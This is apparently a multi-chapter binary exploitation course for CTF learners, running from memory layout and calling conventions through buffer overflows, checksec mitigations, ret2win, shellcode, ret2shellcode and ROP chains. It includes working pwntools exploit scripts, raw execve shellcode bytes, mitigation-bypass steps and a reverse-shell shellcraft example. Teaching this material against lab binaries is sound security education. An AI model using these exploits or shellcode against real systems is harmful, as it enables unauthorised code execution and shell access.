1 // Memory Layout of a Process
Before you exploit anything, you need to know where things live in memory. When you run ./program, the kernel doesn't just dump the binary into RAM — it carves out a structured address space with five distinct regions, each with its own rules.
The Five Regions
What Lives Where
| Region | Permissions | What's Stored | Why Exploiters Care |
|---|---|---|---|
| .text | R-X (read+exec) | Compiled machine code | Target for ret2win, source of ROP gadgets |
| .data | RW- | Initialized globals (int x = 5;) | Sometimes contains writable function pointers |
| .bss | RW- | Uninitialized globals (int x;) | Often used as scratch space for shellcode |
| Heap | RW- | malloc() chunks | Heap exploitation (UAF, double-free, etc.) |
| Stack | RW- (or RWX if NX off) | Local vars, saved registers, return addresses | ★ The main playground for stack exploitation |
See It Yourself
Compile this and run it — you'll see exactly where every variable lives:
#include <stdio.h>
#include <stdlib.h>
int global_init = 42; // .data
int global_uninit; // .bss
char *str = "hello"; // pointer in .data, string in .rodata
void func() {} // .text
int main() {
int local = 7; // stack
int *heap = malloc(4); // heap
printf(".text func : %p\n", func);
printf(".data global : %p\n", &global_init);
printf(".bss global : %p\n", &global_uninit);
printf("heap ptr : %p\n", heap);
printf("stack local : %p\n", &local);
}.text func : 0x401136
.data global : 0x404010
.bss global : 0x404020
heap ptr : 0x21cb2a0
stack local : 0x7fffffffe2ccNotice how stack addresses are huge (start with 0x7fff...) and code addresses are tiny (0x4011...). That's a Linux convention you'll see every single time you debug.
View the Map at Runtime
Linux exposes the live memory map of every process via /proc/[pid]/maps:
# In one terminal: run a program that hangs
$ ./program &
[1] 12345
# In another terminal:
$ cat /proc/12345/maps
555555554000-555555555000 r--p ... /home/user/program # readable text
555555555000-555555556000 r-xp ... /home/user/program # .text
555555556000-555555557000 r--p ... /home/user/program # .rodata
555555557000-555555558000 rw-p ... /home/user/program # .data + .bss
7ffff7d8b000-7ffff7db3000 r--p ... /lib/x86_64-linux-gnu/libc.so.6
7ffff7fbe000-7ffff7fbf000 rw-p ... [stack] # THE STACKIn pwndbg, the same info comes from vmmap. Memorize that command — you'll use it constantly.
2 // The Stack — Deep Dive
The stack is where 95% of beginner-level binary exploitation happens. If you only deeply understand one data structure for pwn, make it this one.
What the Stack Actually Is
The stack is a region of memory that grows downward (toward lower addresses) and is managed by two CPU registers:
RSP— Stack Pointer. Always points to the top of the stack (lowest currently-used address).RBP— Base Pointer. Points to the base of the current function's frame.
Function Prologue and Epilogue
Every compiled C function on x86-64 starts with the same 2-3 instructions and ends with the same 2. These are the prologue and epilogue.
push rbp ; save caller's base pointer onto stack
mov rbp, rsp ; new frame: rbp points to top of saved area
sub rsp, 0x40 ; allocate 64 bytes for local variablesleave ; mov rsp, rbp ; pop rbp (undo the prologue)
ret ; pop the return address into rip — JUMPS BACKThat last instruction — ret — is the entire reason buffer overflow exploitation works. ret blindly pops 8 bytes off the stack into RIP and jumps there. If you control those 8 bytes, you control program execution.
Anatomy of a Stack Frame (x86-64)
The buffer sits at the bottom (lowest address). To reach the return address, you write upward — past the end of the buffer, past saved RBP, into saved RIP. That's a buffer overflow.
What CALL and RET Actually Do
These two instructions are the heartbeat of every exploit. Memorize their exact behavior:
| Instruction | What it does | Pseudo-code |
|---|---|---|
| call addr | Push return address, jump | push rip+next; rip = addr |
| ret | Pop 8 bytes, jump there | rip = pop() |
| push X | Decrement RSP by 8, write X | rsp -= 8; *rsp = X |
| pop X | Read 8 bytes, increment RSP | X = *rsp; rsp += 8 |
Trace Through a Real Function
void greet() {
char buf[16];
gets(buf); // read user input
}
int main() {
greet();
return 0;
}When main calls greet(), here's exactly what's on the stack at the moment gets() is about to read input:
The buffer is 16 bytes. To overwrite the return address, you'd need to write 16 bytes of padding + 8 bytes of saved RBP = 24 bytes of garbage, then your target address as bytes 25-32. That's it. That's the exploit.
The Famous Diagram (memorize this)
Once you have this diagram in your head, every stack BOF exploit looks the same: padding + filler for RBP + your target. The only difference between challenges is what the target is.
3 // Calling Conventions
Every time a function is called, the CPU follows a strict contract about where arguments go and where the return value ends up. That contract is the calling convention, and it changes between 32-bit and 64-bit Linux. You have to know both.
x86-64 System V ABI (64-bit Linux)
This is what you'll deal with on every modern Linux CTF challenge.
| Argument | Register |
|---|---|
| 1st arg | RDI |
| 2nd arg | RSI |
| 3rd arg | RDX |
| 4th arg | RCX |
| 5th arg | R8 |
| 6th arg | R9 |
| 7th+ args | Stack (right-to-left) |
| Return value | RAX |
Memory aid: "Diane's Silk Dress Cost $89" → RDI, RSI, RDX, RCX, R8, R9.
x86 cdecl (32-bit Linux)
32-bit is simpler — and slower. All arguments go on the stack, pushed right-to-left.
push 3 ; 3rd arg first
push 2 ; 2nd arg
push 1 ; 1st arg last (so it's on top of stack)
call foo ; pushes return addr, jumps to foo
add esp, 12 ; caller cleans up the 3 argsReturn value is in EAX. Inside foo, args are accessed as [ebp+8], [ebp+12], [ebp+16].
Why This Matters For Exploitation
Different calling conventions = different exploit shapes:
32-bit ret2libc — easy mode▶
In 32-bit, args go on the stack. So to call system("/bin/sh"), you just place system's address followed by a fake return address followed by a pointer to "/bin/sh" — all on the stack:
[ padding ][ saved RBP ][ &system ][ fake_ret ][ &"/bin/sh" ]That's it. No gadgets needed.
64-bit ret2libc — needs gadgets▶
In 64-bit, the first arg has to be in RDI, not on the stack. There's no instruction in system() that loads RDI from the stack — so you need a gadget: a tiny snippet of code somewhere in the binary that does pop rdi ; ret. You stack:
[ padding ][ &'pop rdi; ret' ][ &"/bin/sh" ][ &system ]The gadget pops "/bin/sh" into RDI, then returns into system. This is your first ROP chain.
System Calls vs Function Calls
Tricky detail that bites everyone once: syscalls use a different register for the 4th argument than function calls.
| 4th arg | Why | |
|---|---|---|
| Function call | RCX | Standard System V ABI |
| Syscall | R10 | The syscall instruction itself clobbers RCX |
So if you're writing shellcode that uses raw syscalls (like execve), the args go: RAX=syscall#, RDI, RSI, RDX, R10, R8, R9.
Cheat Sheet
// 64-bit function call:
rdi, rsi, rdx, rcx, r8, r9 → return in rax
// 64-bit syscall:
rax=#, rdi, rsi, rdx, r10, r8, r9 → return in rax
// 32-bit function call (cdecl):
all args on stack, pushed right-to-left → return in eax
// 32-bit syscall:
eax=#, ebx, ecx, edx, esi, edi, ebp → return in eax4 // Vulnerable C Functions — The Hall of Shame
Every BOF exploit starts with a developer using one of a small set of "dangerous" C functions. Memorize this list. When you open a binary in Ghidra and see one of these, you've found your vulnerability.
The Big Five
gets() — the king of crimes▶
gets(buf) reads from stdin until newline, with no bounds check. There is literally no safe way to use it. The C standard removed it in C11 — but compiled binaries still have it.
char buf[16];
gets(buf); // user types 1000 chars → 984 bytes overflowSafer: fgets(buf, sizeof(buf), stdin).
strcpy() / strcat()▶
Copy / concatenate strings until the source's null byte. No size check.
char dest[8];
strcpy(dest, argv[1]); // argv[1] could be 1MB — boomSafer: strncpy(dest, src, sizeof(dest)-1) + manual null-terminate, or snprintf.
sprintf()▶
Like printf but writes to a buffer. No size limit on the formatted output.
char buf[32];
sprintf(buf, "Hello, %s!", argv[1]); // argv[1] is 100 chars → overflowSafer: snprintf(buf, sizeof(buf), ...).
scanf("%s", ...) — silent killer▶
Looks innocent. Without a width specifier, %s reads until whitespace with no bounds check.
char buf[16];
scanf("%s", buf); // vulnerable!
scanf("%15s", buf); // safe — width specifier matches buf size-1read() / fread() with wrong size▶
These functions do take a size — but developers screw it up:
char buf[16];
read(0, buf, 100); // reads 100 bytes into 16-byte buffer
read(0, buf, sizeof(buf*)); // sizeof a pointer = 8, not buffer sizeAlways check that the read size matches the actual buffer size, not sizeof(pointer).
Format String Family
These don't cause buffer overflows directly, but if user input reaches them as the format argument, you get an arbitrary memory read/write primitive (Chapter 17):
// VULNERABLE — user controls the format string
printf(user_input);
fprintf(fp, user_input);
sprintf(buf, user_input);
syslog(LOG_INFO, user_input);// SAFE — format string is a literal
printf("%s", user_input);Quick Audit Workflow
When you get a new binary, the first thing you do is grep for these:
# Look for dangerous imports
$ objdump -d ./vuln | grep -E "call.*<(gets|strcpy|strcat|sprintf|scanf|system|exec)"
# Or in pwntools
>>> e = ELF('./vuln')
>>> 'gets' in e.symbols # True = jackpot
>>> e.symbols['win'] # address of win() if it exists5 // Your First Buffer Overflow
Time to actually crash a program and look at what happened. This is the "oh, that's it?" moment that turns binexp from scary to obvious.
The Vulnerable Program
#include <stdio.h>
void vuln() {
char buf[64];
printf("Give me input: ");
gets(buf); // the bug
printf("You said: %s\n", buf);
}
int main() {
vuln();
return 0;
}gcc -fno-stack-protector -no-pie -z execstack -o vuln vuln.cThe compiler will warn you about gets. That's fine — we're doing this on purpose.
Step 1: Crash It
$ ./vuln
Give me input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You said: AAAA...AAAA
Segmentation fault (core dumped)Congratulations — you just exploited your first program. The crash means RIP got overwritten with 0x4141414141414141 (eight ASCII 'A's), the CPU tried to fetch instructions from that address, found nothing valid there, and the kernel killed your process.
Step 2: Confirm in GDB
$ gdb -q ./vuln
pwndbg> run
<<< paste 80 'A's at the prompt >>>
Program received signal SIGSEGV, Segmentation fault.
RAX 0x0
RIP 0x4141414141414141 ← we own this register
*RSP 0x7fffffffe2e8 ◂— ...RIP is now 0x4141.... That's not just a crash — that's arbitrary control over execution flow. Whatever 8 bytes you put at the right offset will be the next instruction the CPU jumps to.
Step 3: How Did It Happen?
Here's the stack layout for the vuln() function:
Send 72 bytes of garbage and then 8 bytes of address — those 8 bytes become the new RIP.
The Mental Model You Need
The Word "Offset"
You'll hear "offset to RIP" 1000 times. It just means: the number of bytes from the start of your input to where the saved return address sits. In this example it was 72. You'll use a tool to find it automatically next chapter.
Things That Will Stop You (For Now)
Modern compilers turn on protections that make this trivial example fail. Until we cover bypasses, compile with these flags so things work:
| Flag | What it disables | Why we want it off |
|---|---|---|
| -fno-stack-protector | Stack canary | Canary detects overflow → process aborts |
| -no-pie | Position-Independent Executable | So function addresses are static and predictable |
| -z execstack | NX bit | So we can run shellcode on the stack later |
| echo 0 > /proc/sys/kernel/randomize_va_space | ASLR (system-level) | So stack/libc addresses don't randomize |
Once you've got the basics down, we'll turn each protection back on and learn how to defeat it.
6 // Cyclic Patterns — Finding the Offset
You don't want to send 8 'A's, then 16, then 24, manually narrowing in on where RIP overflow starts. There's a 3-second tool for that, based on a beautiful piece of math called a De Bruijn sequence.
The Idea
A De Bruijn sequence is a string where every possible substring of length N appears exactly once. Pwntools' cyclic generates these for you. When the program crashes, you read the value in RIP, look it up in the sequence, and you instantly know the offset.
Generate
$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaa...Now feed that into your crashing program:
$ gdb -q ./vuln
pwndbg> run < <(cyclic 200)
...
RIP 0x6161617661616175 ← look at this!Look It Up
$ cyclic -l 0x6161617661616175
72Done. Offset to RIP is 72 bytes. Took 3 commands. No guessing.
2-bit Patterns
For 32-bit binaries, RIP is only 4 bytes:
$ cyclic -l 0x61616173 # 4-byte chunk
56Pwntools' Python API does the same:
>>> from pwn import *
>>> cyclic(200)
b'aaaabaaacaaadaaa...'
>>> cyclic_find(0x6161617661616175)
72
>>> cyclic_find(b'vaaa')
72Inside pwndbg
Pwndbg builds it in:
pwndbg> cyclic 200 # generates pattern
pwndbg> cyclic -l $rip # looks up current RIP valueWhy Not Just Brute-Force?
You could send 100 'A's, then 200, then 300, and binary-search. People do this. But:
- Cyclic gives you the answer in one run.
- It works even if the offset is weird (like 73, not a multiple of 8).
- It's the standard — every CTF writeup will use it.
Practice It
Right now, fire up your VM, compile vuln.c from chapter 5, run it under GDB with a cyclic input, and find the offset. Don't read on until you've done it. Muscle memory matters.
7 // Exploit Mitigations & checksec
Modern binaries ship with multiple defenses. Each one blocks a specific class of exploit. checksec tells you which are on. Reading its output is the first thing you do on any new binary.
RELRO STACK CANARY NX PIE
Full RELRO Canary found NX enabled PIE enabledThe Five Defenses
NX / DEP — No-eXecute▶
What it does: Marks the stack and heap as non-executable. The CPU refuses to run instructions from those regions.
What it blocks: Classic shellcode injection. You can no longer write shellcode to the stack and jump to it.
How to bypass: Don't inject new code. Reuse code that's already in the binary or libc — that's ROP and ret2libc.
Disable for testing: gcc -z execstack
Stack Canary — overflow detector▶
What it does: Compiler inserts a random 8-byte value between local variables and saved RBP. Before ret, it checks the canary is unchanged. If it's been overwritten, the program calls __stack_chk_fail and dies.
What it blocks: Naive stack overflows that overwrite RIP. The canary sits between buf and RIP — any overflow has to clobber it.
How to bypass: 1. Leak it via format string or another bug, then include the correct value in your payload. 2. Brute-force it (only on forking servers where the child inherits the parent's canary). 3. Skip it by overwriting via a non-stack vulnerability (heap, GOT, etc.).
Disable: gcc -fno-stack-protector
PIE — Position Independent Executable▶
What it does: The binary itself is loaded at a random base address each run. Function addresses inside the binary are unpredictable.
What it blocks: Naive ret2win. You can't hardcode 0x401234 if the base changes.
How to bypass: Leak any one address from the binary at runtime (via format string, info-leak bug, or partial overwrite). Subtract its known offset from the symbol to get the base. Add the base to any other symbol's offset to get its real address.
Disable: gcc -no-pie
ASLR — Address Space Layout Randomization▶
What it does: Kernel-level. Randomizes stack base, libc base, heap base on every execution.
What it blocks: Hardcoded shellcode addresses, hardcoded libc addresses.
How to bypass: Same as PIE — leak any libc address (via puts(puts@got) trick), calculate libc base, then anything in libc is yours.
Disable system-wide: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Disable in GDB only: set disable-randomization on (this is the default in pwndbg).
RELRO — Read-Only Relocations▶
What it does: Makes the GOT (Global Offset Table) read-only after the dynamic linker has resolved all imports.
- No RELRO — GOT writable always. Easy GOT overwrite.
- Partial RELRO — GOT writable until lazy binding resolves. Still partly exploitable.
- Full RELRO — GOT entirely read-only. GOT overwrite impossible.
How to bypass: If Full RELRO, find another writable function pointer (like __free_hook in heap exploitation, or a custom function table).
Disable: gcc -z norelro or -Wl,-z,norelro
Quick Reference Matrix
| Mitigation | Blocks | Defeated By |
|---|---|---|
| NX | Stack shellcode | ROP / ret2libc |
| Canary | Naive stack BOF | Leak the canary |
| PIE | Hardcoded binary addrs | Leak any binary addr |
| ASLR | Hardcoded libc/stack addrs | Leak any libc addr |
| Full RELRO | GOT overwrite | Different write target |
The Strategy Question
When you run checksec and see all five protections enabled, your strategy is fixed:
- Find an info-leak bug (or use the BOF itself as one).
- Leak a libc address → defeats ASLR.
- Leak the canary → defeats canary.
- Leak a binary address → defeats PIE.
- Now build a ROP chain to
system("/bin/sh").
Every "all protections on" challenge is some variation of these five steps.
8 // Tool Setup — Install Everything
This is the chapter you reference forever. Install these once on a fresh Ubuntu 22.04 VM and you're set for every challenge in this course (and every CTF you'll ever do).
System Prep
sudo apt update && sudo apt upgrade -y
sudo apt install -y build-essential gcc-multilib g++-multilib \
python3 python3-pip python3-dev git curl wget vim \
net-tools binutils elfutils ruby-full. pwntools — your exploit framework
python3 -m pip install --upgrade pwntoolsVerify:
$ python3 -c "from pwn import *; print(context)"
ContextType(arch='i386', bits=32, ...). pwndbg — GDB on steroids
Pick one of pwndbg / GEF / PEDA. We use pwndbg in this course. It's the most actively maintained and best for pwn.
git clone https://github.com/pwndbg/pwndbg ~/pwndbg
cd ~/pwndbg
./setup.shVerify:
$ gdb
pwndbg> # prompt should say "pwndbg" not "(gdb)"Alternatives: GEF and PEDA▶
GEF — modern, Python-based, similar features to pwndbg:
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"PEDA — older, still works, lighter:
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinitYou can only have one active at a time. Switch by editing ~/.gdbinit.
. checksec — protection inspector
wget https://raw.githubusercontent.com/slimm609/checksec.sh/master/checksec
chmod +x checksec
sudo mv checksec /usr/local/bin/. Ropper — gadget hunter (Python)
python3 -m pip install ropper. ROPgadget — alternative gadget hunter
python3 -m pip install ropgadgetWhy both? Each finds slightly different gadgets. When one fails to find what you need, try the other.
. one_gadget — magic addresses for ret2libc
sudo gem install one_gadgetVerify:
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xebc81 execve("/bin/sh", r15, rdx)
constraints: .... patchelf + pwninit — libc swap helpers
sudo apt install patchelf
# pwninit needs Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
cargo install pwninit. Disassembler — Ghidra
Ghidra is free and the standard tool used in this course. Download from ghidra-sre.org.
# Java prerequisite
sudo apt install -y openjdk-17-jdk
# Run
cd ~/ghidra_*
./ghidraRunAlternatives mentioned in your refs:
- IDA Free — also free, slightly nicer UI, no decompiler in free version.
- Binary Ninja — paid (~$300), excellent decompiler, scriptable.
- Cutter — radare2 frontend, free.
- Hopper — paid, macOS/Linux.
- radare2 — covered in the RE course.
. Helpers (already on system)
| Tool | What you'll use it for |
|---|---|
| file | 32-bit or 64-bit? Stripped? |
| strings | Find hardcoded strings (passwords, paths, "/bin/sh") |
| ldd | Which libc does this binary need? |
| readelf -a | Sections, symbols, GOT, dynamic info |
| objdump -d -M intel | Disassembly in Intel syntax |
| nm | Symbols (won't work on stripped binaries) |
| xxd / hexdump -C | Look at raw bytes |
0. One-Shot Verification
Run all of this. If any line errors, fix it before moving on:
checksec --version
ropper --version
ROPgadget --version
one_gadget --version
patchelf --version
python3 -c "import pwn; print('pwntools', pwn.__version__)"
gdb --version | head -1
gcc --version | head -1Bonus: ~/.gdbinit Setup
Drop this in ~/.gdbinit for sane defaults:
set disassembly-flavor intel
set disable-randomization on
set follow-fork-mode parent
set pagination off
set history save on
set history size 10000
set history filename ~/.gdb_history
source ~/pwndbg/gdbinit.py9 // Ret2Win — Your First Real Exploit
This is the "Hello World" of binary exploitation. The binary has a hidden function that, if called, prints the flag (or gives a shell). Your job: hijack execution and call it.
The Vulnerable Program
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void win() {
printf("Congrats! You called win()\n");
system("/bin/sh");
}
void vuln() {
char buf[64];
printf("Input: ");
gets(buf);
}
int main() {
vuln();
return 0;
}gcc -fno-stack-protector -no-pie -o ret2win ret2win.cThe Plan
- Find the offset to RIP using cyclic.
- Find the address of
win. - Build payload:
[ padding ][ &win ]. - Send it. Get shell.
Step 1: Find the Offset
$ gdb -q ./ret2win
pwndbg> run
<<< cyclic 200 >>>
RIP 0x6161617661616175
pwndbg> cyclic -l 0x6161617661616175
72Step 2: Find win()
$ objdump -d ret2win | grep "<win>:"
0000000000401196 <win>:Or in pwntools:
>>> e = ELF('./ret2win')
>>> hex(e.symbols['win'])
'0x401196'Step 3: The Exploit
from pwn import *
exe = ELF("./ret2win")
context.binary = exe
p = process("./ret2win")
offset = 72
win_addr = exe.symbols["win"]
payload = b"A" * offset
payload += p64(win_addr)
p.sendlineafter(b"Input: ", payload)
p.interactive()$ python3 solve.py
[+] Starting local process './ret2win': pid 12345
Congrats! You called win()
$ id
uid=1000(user) ...That's it. That's a working exploit. Now let's break down what every line did.
What Just Happened
When vuln() hits its ret instruction, it pops 8 bytes off the stack. Those 8 bytes are now 0x401196 (win's address). RIP becomes that, and the next instruction the CPU runs is the start of win().
The Stack Alignment Gotcha (64-bit)
Here's a trap that catches everyone. On 64-bit, calling system() sometimes crashes with a SIGSEGV in movaps instead of giving you a shell. That's because the System V ABI requires 16-byte stack alignment at function call boundaries.
When your ROP chain enters system(), RSP often isn't 16-byte aligned (because we skipped the normal CALL instruction). The fix is a ret gadget — one extra ret in the chain to align the stack:
payload = b"A" * 72
payload += p64(ret_gadget) # aligns the stack
payload += p64(win_addr)Find a ret gadget with:
$ ROPgadget --binary ret2win | grep ": ret"
0x000000000040101a : retIf your win() doesn't internally call system(), you don't need this. But once you start doing ret2libc, this gadget is your best friend.
0 // Ret2Win With Arguments
Same idea as last chapter, but now the win function checks its arguments. You can't just jump to it — you have to control the arguments too. This is your first taste of controlling registers, which is what every 64-bit exploit does.
The Vulnerable Program
void win(int a, int b) {
if (a == 0xdeadbeef && b == 0xc0debabe) {
printf("You win!\n");
system("/bin/sh");
} else {
printf("Wrong args.\n");
}
}
void vuln() {
char buf[64];
gets(buf);
}
int main() { vuln(); return 0; }The Problem
x86-64 calling convention says: 1st arg in RDI, 2nd arg in RSI. We need RDI = 0xdeadbeef and RSI = 0xc0debabe before win runs.
The stack overflow only lets us write to memory. We need to write to registers. The trick: find a tiny piece of code that does write to registers from the stack, then use it.
Enter Gadgets
A gadget is a sequence of instructions ending in ret that you find inside the existing binary. The classic ones:
pop rdi
retThis pops 8 bytes off the stack into RDI, then returns. If you put RDI's desired value on the stack before the ret target, this gadget will load it for you.
Find the Gadgets
$ ROPgadget --binary ret2win_args | grep ": pop rdi ; ret"
0x0000000000401333 : pop rdi ; ret
$ ROPgadget --binary ret2win_args | grep ": pop rsi ; ret"
0x0000000000401331 : pop rsi ; pop r15 ; ret # note the extra pop!Notice pop rsi often comes paired with pop r15. That's fine — we just have to put 8 bytes of garbage on the stack to feed r15.
Build the Chain
The Exploit
from pwn import *
exe = ELF("./ret2win_args")
context.binary = exe
p = process(exe.path)
pop_rdi = 0x0000000000401333 # pop rdi ; ret
pop_rsi_r15 = 0x0000000000401331 # pop rsi ; pop r15 ; ret
win_addr = exe.symbols["win"]
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(0xdeadbeef)
payload += p64(pop_rsi_r15)
payload += p64(0xc0debabe)
payload += p64(0x4141414141414141) # r15 garbage
payload += p64(win_addr)
p.sendline(payload)
p.interactive()Pwntools' ROP Helper
Pwntools has a ROP object that does this for you:
from pwn import *
exe = ELF("./ret2win_args")
rop = ROP(exe)
rop.win(0xdeadbeef, 0xc0debabe) # auto-builds the chain!
print(rop.dump()) # show the chain
payload = b"A"*72 + rop.chain()
process(exe.path).sendline(payload)This is the level of automation you'll use 90% of the time. Building chains by hand is for understanding; ROP() is for shipping exploits.
1 // Shellcode 101
Shellcode is a small chunk of machine code that, when executed, does something useful — usually spawning a shell with execve("/bin/sh", NULL, NULL). Before we use it (next chapter), let's understand what's inside it.
The Goal: execve("/bin/sh", NULL, NULL)
On Linux x86-64, this is syscall #59 (SYS_execve). To invoke it from assembly:
| Register | Value |
|---|---|
| RAX | 59 (syscall number) |
| RDI | pointer to "/bin/sh" |
| RSI | 0 (no argv) |
| RDX | 0 (no envp) |
Then execute the syscall instruction. Done.
The Naive Version
section .text
global _start
_start:
mov rax, 0x68732f6e69622f ; "/bin/sh\0" (8 bytes)
push rax
mov rdi, rsp ; rdi = pointer to "/bin/sh"
mov rax, 59
mov rsi, 0
mov rdx, 0
syscallThe Bad-Char Problem
If your shellcode is delivered via a function like strcpy or scanf("%s"), any null byte (0x00) in the shellcode will truncate the string and break it.
The naive version above has tons of null bytes. mov rsi, 0 assembles to 48 c7 c6 00 00 00 00 — four nulls. Won't work.
The Trick: XOR for Zero
xor reg, reg sets a register to zero with no nulls in the encoding:
xor rsi, rsi ; encodes as: 48 31 f6 (no nulls)The Clean Version
section .text
global _start
_start:
xor rax, rax
mov rbx, 0x68732f2f6e69622f ; "/bin//sh" — note doubled slash
push rax ; null terminator
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov al, 59 ; al = lower byte of rax. avoids nulls.
syscallWhy "/bin//sh" (doubled slash) instead of "/bin/sh\0"? Because /bin//sh is exactly 8 bytes and execve treats double-slash as single — same result, no awkward null in the middle.
Assemble and Test
$ nasm -f elf64 shellcode.asm -o shellcode.o
$ ld shellcode.o -o shellcode
$ ./shellcode
$ id
uid=1000(user) ...Extract the Bytes
$ objdump -d shellcode -M intel | grep -E "^ +[0-9a-f]+:" | awk -F$'\t' '{print $2}' | tr -d ' \n'
4831c048bb2f62696e2f2f7368504889e74831f64831d2b03b0f05That hex is your shellcode. As a Python bytestring:
shellcode = b"\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05"The Lazy Way: pwntools.shellcraft
You don't have to write shellcode by hand. Pwntools generates clean, null-free shellcode for you:
from pwn import *
context.arch = "amd64"
shellcode = asm(shellcraft.sh())
print(shellcode)
print(len(shellcode), "bytes")Or for 32-bit:
context.arch = "i386"
shellcode = asm(shellcraft.sh())The msfvenom Way
Metasploit's msfvenom generates shellcode for many platforms:
msfvenom -p linux/x64/exec CMD="/bin/sh" -f python -b "\x00"The -b "\x00" tells it to avoid null bytes.
Common Shellcode Tasks
| Goal | Pwntools shortcut |
|---|---|
| Spawn /bin/sh | shellcraft.sh() |
| Read flag.txt to stdout | shellcraft.cat("flag.txt") |
| Exit cleanly | shellcraft.exit(0) |
| Reverse shell | shellcraft.connect("1.2.3.4", 1337) + shellcraft.dupsh() |
NOP Sleds
When you can't predict the exact landing address, prepend NOPs (0x90 on x86):
payload = b"\x90"*200 + shellcodeLand anywhere in the NOP sled and you'll slide down to your shellcode. Not strictly necessary if your address is exact, but useful for stack-shellcode-with-jitter scenarios.
2 // Ret2Shellcode
Combine the last two chapters: inject shellcode into the buffer, then jump to it. This is the original buffer overflow exploit from the 1990s. It only works when NX is off — but every modern CTF will have a "warmup" challenge that uses it.
Requirements
- Buffer big enough to hold shellcode (~30 bytes minimum).
- NX disabled (stack is executable).
- Known stack address (or ASLR off, or a leak).
The Vulnerable Program
#include <stdio.h>
void vuln() {
char buf[200]; // big enough for shellcode
printf("Buffer at: %p\n", buf); // gives us the address!
gets(buf);
}
int main() { vuln(); return 0; }gcc -fno-stack-protector -no-pie -z execstack -o ret2sc ret2sc.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceThe Plan
The shellcode goes at the start of the buffer. Padding fills the rest. Then we put the address of buf as the new RIP. When ret fires, RIP becomes the address of our shellcode, and execution flows right into it.
Step 1: Find Offset
$ gdb -q ./ret2sc
pwndbg> run < <(cyclic 300)
RIP 0x6161616a61616169
pwndbg> cyclic -l 0x6161616a61616169
216Buffer is 200 bytes, plus 8 bytes saved RBP = 208. But offset is 216? That's compiler padding for 16-byte alignment. Always trust cyclic, never trust your math.
Step 2: Build the Exploit
from pwn import *
context.binary = exe = ELF("./ret2sc")
context.arch = "amd64"
p = process(exe.path)
# Read the leaked buffer address from the program's output
p.recvuntil(b"Buffer at: ")
buf_addr = int(p.recvline().strip(), 16)
log.success("buf @ " + hex(buf_addr))
shellcode = asm(shellcraft.sh())
payload = shellcode
payload += b"A" * (216 - len(shellcode))
payload += p64(buf_addr) # jump back to start of buf
p.sendline(payload)
p.interactive()$ python3 solve.py
[+] buf @ 0x7fffffffe2a0
$ id
uid=1000(user) ...Without an Address Leak (ASLR off)
If the program doesn't print the buffer address, you have to find it in GDB and hope it's stable:
pwndbg> break *vuln+25
pwndbg> run
<<< type something >>>
pwndbg> x/s $rsp
0x7fffffffe2a0: "AAAA..."That address (with ASLR off) will be the same on subsequent runs. Hardcode it.
Add a NOP Sled for Safety
If your guessed address might be a few bytes off, prepend NOPs:
payload = b"\x90" * 100 # NOP sled — land anywhere here
payload += shellcode
payload += b"A" * (216 - len(payload))
payload += p64(buf_addr + 50) # aim for middle of sledWhy This Doesn't Work in Real Life
Two things kill ret2shellcode:
- NX — the stack isn't executable, so even jumping to your shellcode just causes a SIGSEGV.
- ASLR — without a leak, you don't know where the stack is.
Both are on by default on every modern Linux. So in practice, you'll do ROP/ret2libc instead. But if you ever see checksec say "NX disabled" — go straight to ret2shellcode. Easiest exploit there is.
3 // ROP — Return-Oriented Programming
NX makes shellcode injection useless. The fix: don't bring your own code — reuse the code that's already in the binary. Chain together small snippets called gadgets, each ending in ret, to build any computation you want.
What is a Gadget?
A gadget is 1-5 instructions ending in ret. The most useful ones are extremely short:
| Gadget | Effect |
|---|---|
| pop rdi ; ret | Sets RDI from stack |
| pop rsi ; ret | Sets RSI from stack |
| pop rdx ; ret | Sets RDX from stack |
| pop rax ; ret | Sets RAX (syscall number) |
| syscall ; ret | Triggers a syscall |
| ret | Stack alignment / no-op |
| mov [rdi], rsi ; ret | Arbitrary write |
How a ROP Chain Executes
The CPU's ret instruction pops 8 bytes off the stack into RIP and jumps. So if you stack a series of gadget addresses, each one runs and then rets into the next:
It's like a Rube Goldberg machine. Each ret kicks off the next gadget.
Finding Gadgets
Two tools, same job:
# Ropper
$ ropper --file ./vuln --search "pop rdi"
0x0000000000401333: pop rdi; ret;
0x0000000000401412: pop rdi; pop rbp; ret;
# ROPgadget
$ ROPgadget --binary ./vuln | grep "pop rdi"
0x0000000000401333 : pop rdi ; retPwntools finds them in Python:
>>> e = ELF('./vuln')
>>> rop = ROP(e)
>>> rop.find_gadget(['pop rdi', 'ret'])
Gadget(0x401333, ['pop rdi', 'ret'], ['rdi'], 0x10)Build a Chain Manually
Goal: call printf("flag.txt is at /home/user") — basically arbitrary function call. We need RDI = pointer to a string.
from pwn import *
exe = ELF("./vuln")
# Find a string in the binary or write one to .bss
flag_str = next(exe.search(b"flag.txt\x00"))
pop_rdi = 0x401333
puts = exe.plt["puts"]
ret = 0x40101a # a single 'ret' for stack alignment
chain = p64(pop_rdi)
chain += p64(flag_str)
chain += p64(ret) # align stack
chain += p64(puts)
payload = b"A"*72 + chainBuild a Chain with pwntools (the easy way)
from pwn import *
exe = ELF("./vuln")
rop = ROP(exe)
rop.puts(next(exe.search(b"flag.txt")))
print(rop.dump()) # pretty-print the chain
payload = b"A"*72 + rop.chain()Output of rop.dump() looks like:
0x0000: 0x401333 pop rdi; ret
0x0008: 0x402008 [arg0] rdi = 4202504
0x0010: 0x401030 putsMulti-Step Chains
Chain functions: read flag, then exit cleanly:
rop.open(filename, 0) # open(flag.txt, O_RDONLY)
rop.read(3, buf, 100) # read 100 bytes from fd 3 to buf
rop.write(1, buf, 100) # write to stdout
